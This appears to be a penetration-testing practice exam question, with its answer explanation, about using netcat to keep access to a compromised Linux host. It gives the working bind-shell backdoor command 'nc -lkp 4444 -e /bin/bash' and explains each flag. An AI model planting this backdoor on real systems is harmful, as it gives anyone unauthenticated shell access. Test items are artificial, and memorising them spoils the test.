A penetration tester is tasked with establishing a simple backdoor on a compromised Linux machine to maintain access for future exploitation. The tester has decided to use a commonly available network utility to listen on an arbitrary port for incoming connections. Which of the following commands should the tester use to create a persistent listening backdoor on port 4444 that executes a Bash shell for any connecting IP?
The correct answer is nc -lkp 4444 -e /bin/bash. This command utilizes the network utility to listen (-l) persistently with the keep-alive option (-k) on port 4444 (-p 4444), and executes (-e) the Bash shell /bin/bash when a connection is made. Hence, it creates a backdoor that can be accessed by the tester later. The incorrect options do not correctly use the switches needed for persistent listening or do not execute a Bash shell upon connection.